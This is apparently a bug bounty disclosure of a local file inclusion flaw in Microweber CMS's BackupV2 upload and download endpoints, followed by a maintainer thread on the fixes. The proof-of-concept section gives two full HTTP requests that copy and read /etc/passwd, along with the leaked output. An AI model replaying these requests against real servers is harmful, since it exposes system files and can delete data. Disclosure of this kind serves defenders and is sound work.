External Control of File Name or Path in microweber/microweber

Valid

Reported on

Jan 29th 2022

Description

In the Microweber CMS, there are two endpoints that can be used together to get local file inclusion vulnerability.

  1. /api/BackupV2/upload?src=/etc/passwd
  2. /api/BackupV2/download?file=passwd

When logged in as administrator, we can upload any readable file from the operating system into the backups folder. The backup files are located in /var/www/microweber/storage/backup_content/.

Proof of Concept

  1. Upload /etc/passwd file into the backups folder.
GET /api/BackupV2/upload?src=/etc/passwd HTTP/1.1
Host: 192.168.188.132
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.188.132/admin/view:modules/load_module:admin__backup_v2
Cookie: -- snippet --
  1. Read the file from the backups folder.
GET /api/BackupV2/download?file=passwd HTTP/1.1
Host: 192.168.188.132
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.188.132/admin/view:modules/load_module:admin__backup_v2
Cookie: -- snippet --

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
-- snippet --

Impact

This vulnerability is capable of local file inclusion and can be used to gain access to the server when combined with vulnerability chaining. Additionally original files are deleted after uploading, as a result of that files can be lost. So deleting any file in the webroot can cause web application to not respond to HTTP requests.

We are processing your report and will contact the microweber team within 24 hours. a year ago
Talha Karakumru modified the report
a year ago
Talha Karakumru modified the report
a year ago
Talha Karakumru modified the report
a year ago
Talha Karakumru modified the report
a year ago
Talha Karakumru modified the report
a year ago
Talha Karakumru modified the report
a year ago
Talha Karakumru modified the report
a year ago
Talha Karakumru modified the report
a year ago
Talha Karakumru modified the report
a year ago
We have contacted a member of the microweber team and are waiting to hear back a year ago
We have sent a follow up to the microweber team. We will try again in 7 days. a year ago
Talha Karakumru
a year ago

Researcher

@maintainer @admin any update?

Jamie Slome
a year ago

Admin

Our automated notification system will continue to reach out to the maintainers. Please get in touch with us once the report has gone stale, and we will manually reach out to the maintainers on your behalf ♥️

Peter Ivanov validated this vulnerability a year ago
Talha Karakumru has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov
a year ago

Maintainer

Hello this issue has been fixed , thanks for the report

Peter Ivanov marked this as fixed in 1.2.11 with commit 957d30 a year ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
Talha Karakumru
a year ago

Researcher

@maintainer Hello Peter, the commit does not seem to be the solution.

Talha Karakumru
a year ago

Researcher

https://github.com/microweber/microweber/commit/98d025467128ecc24195dcb56c533febc3c91af6

https://github.com/microweber/microweber/commit/572bdc36b5b47923790016f6b961c8df53226855

to join this conversation